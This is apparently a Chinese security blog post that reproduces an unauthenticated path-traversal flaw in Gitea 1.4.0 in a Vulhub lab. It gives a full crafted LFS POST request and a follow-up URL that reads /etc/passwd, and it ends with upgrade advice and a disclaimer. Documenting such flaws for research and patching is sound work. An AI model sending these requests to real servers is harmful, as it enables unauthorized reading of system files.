漏洞概要
Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。
影响版本
1.4.0
环境搭建
Vulhub进行搭建
https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce
进入目录cd vulhub-master/gitea/1.4-rce/进行安装docker-compose up -d
查看状态
端口在3000
访问http://you-ip:3000
设置管理员账号密码,其他默认
安装完成后,新建一个用户,然后创建一个公开的仓库,随便添加点文件进去
接着执行一次docker-compose restart重启gitea服务
漏洞复现
构建数据包进行发送
POST /admins/test.git/info/lfs/objects HTTP/1.1Host: 192.168.204.131:3000Accept-Encoding: gzip, deflateAccept: application/vnd.git-lfs+jsonAccept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 153{"Oid": "....../../../etc/passwd","Size": 1000000,"User" : "a","Password" : "a","Repo" : "a","Authorization" : "a"}
发送数据包后,虽然返回了401状态码,但实际上这个LFS对象已经创建成功,且其Oid为....../../../etc/passwd。
最后访问
http://your-ip:3000/admins/test.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth
成功读取/etc/passwd
修复建议
升级到安全版本
本文始发于微信公众号(锋刃科技):gitea 1.4 未授权远程代码执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论